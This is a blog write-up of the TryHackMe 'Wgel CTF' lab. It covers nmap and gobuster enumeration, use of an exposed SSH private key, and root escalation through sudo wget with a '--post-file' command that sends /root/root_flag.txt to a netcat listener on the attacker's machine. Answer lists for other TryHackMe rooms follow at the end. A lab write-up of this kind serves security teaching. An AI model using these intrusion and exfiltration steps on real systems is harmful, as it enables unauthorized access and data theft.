Skip to main content

Wgel CTF

 

tryhackme - wgel CTF

 

NMAP - network mapper

first we are going to do is a general nmap (network mapper) scan so that we get to know how many ports are opened.

# nmap -sT -vv -sC -sV <ip>

 



HTTP

summary of nmap:-

will see here 2 ports are open which are 80 and 22 . Port 22 is used to connect to SSH so with this help we got to know that we can connect through ssh and port 80 is for the HTTP that means it is hosting a website so lets run that IP in our browser.

 



gobuster 

its look like an apache2 server then quick i got an idea of brute-forcing the website with some common extensions. so, to run a brute-force of extensions on website we use a tool called gobuster.

command:- gobuster dir -u <site URL> -w <word list> -x <extn>


root@:~# gobuster dir -u http://10.10.116.173/ -w /usr/share/wordlists/dirb/common.txt -t 25 -x php,html,txt -q 
/index.html (Status: 200)
/index.html (Status: 200)
/server-status (Status: 403)
/sitemap (Status: 301)

 

so here, we found something extension directory on  /sitemap. so i had checked it on my extension then found this.

 


 

lets,check we have any directory in our host..

 

root@:~# gobuster dir -u http://10.10.116.173/sitemap/ -w /usr/share/wordlists/dirb/common.txt -t 25 -x php,html,txt -q 
/.ssh (Status: 301)
/about.html (Status: 200)
/blog.html (Status: 200)
/contact.html (Status: 200)
/css (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
/index.html (Status: 200)
/js (Status: 301)
/services.html (Status: 200)
/shop.html (Status: 200)
/work.html (Status: 200)


ya! we found for .ssh directory then i had opened the extension and found an id_rsa file.It was interesting..

 

here ,id_rsa key ..


then, remember something at starting of this we had an ssh connection possible. and check here the source code of the first wep page we found an user name called jessie.

 


 

 

 

user_flag.txt

to make sure u give a proper permissions to execute the file id_rsa as we know that.

#command - chmod 600 id_rsa

then,run this code to connect:

#ssh -i id_rsa jessie@<ipaddress>

 


 


root_flag.txt  

first we know about privilege escalations the sudo -l to find what are available then i found it has no password so we cannot create a payload for root user then i had got an idea of exploiting vulnerability! then i had created.

# nc -lvnp 4444

on my machine i.e attackers machine

let's check here - https://gtfobins.github.io/gtfobins/wget/

command : sudo /usr/bin/wget --post-file=/root/root_flag.txt http://<Tunnel IP>:4444



then we go for netcat,

# nc -lvnp 4444

we found on root flag here,

 

 

 





Comments

Post a Comment

Popular posts from this blog

Windows Fundamentals 2

 TryHackMe - Windows Fundamentals 2 Task 1 Introduction  #1 :- Read above and start the virtual machine.  Answer :- No Answer Needed Task 2 System Configuration   #2.1 :- What is the name of the service that lists Systems Internals as the manufacturer?  Answer :- PsShutdown #2.2 :- Whom is the Windows license registered to? Answer :- Windows User #2.3 :- What is the command for Windows Troubleshooting? Answer :- C:\Windows\System32\control.exe /name Microsoft.Troubleshooting #2.4 :- What command will open the Control Panel? (The answer is  the name of .exe, not the full path) Answer :- control.exe Task 3 Change UAC Settings  #3 :- What is the command to open User Account Control Settings? (The answer is the name of the .exe file, not the full path)  Answer :- UserAccountControlSettings.exe Task 4 Computer Management  #4.1 :- What is the command to open Computer Management? (The a...
Post a Comment
Read more

Windows Fundamentals 3

 Tryhackme - Windows Fundamentals 3   Task-1 Introduction  #1:- Read the above and start the virtual machine.  Answer:- No Answer Needed Task-2 Windows Updates  #2:- There were two definition updates installed in the attached VM. On what date were these updates installed?  Answer:- 5/3/2021 Task-3 Windows Security  #3:- In the above image, which area needs immediate attention?  Answer:- virus & threat protection Task-4 Virus & threat protection  #4:- Specifically, what is turned off that Windows is notifying you to turn on?  Answer:- Real-time protection Task-5 Firewall & network protection  #5:- If you were connected to airport Wi-Fi, what most likely will be the active firewall profile?  Answer:- public network Task-6 App & browser control  #6:- Read the above.  Answer:- No Answer Needed Task-7 Device security  #7:- What is the TPM?  Answer:- Trusted Platform Module Task-8 BitLocker #8:-...
Post a Comment
Read more

Windows Fundamentals 1

TryhackMe - Windows Fundamentals 1 Task 1 - Introduction to Windows  #1 :- Read above and start the virtual machine.  Answer :- No Answer Needed  Task 2 Windows Editions  #2 :- What encryption can you enable on Pro that you can't enable in Home?  Answer :- BitLocker Task 3 The Desktop (GUI)  #3 :- Which selection will hide/disable the Search box? Answer :- Hidden #3.2 :- Which selection will hide/disable the Task View button? Answer :- Show Task View button #3.3 :- Besides Clock, Volume, and Network, what other icon is visible in the Notification Area? Answer :- Action Center Task 4 The File System  #4 :- What is the meaning of NTFS?  Answer :- New Technology File System Task 5 The Windows\System32 Folders  #5 :- What is the system variable for the Windows folder?  Answer :- %windir% Task 6 User Accounts, Profiles, and Permissions  #6.1 :- What is the name of the other use...
Post a Comment
Read more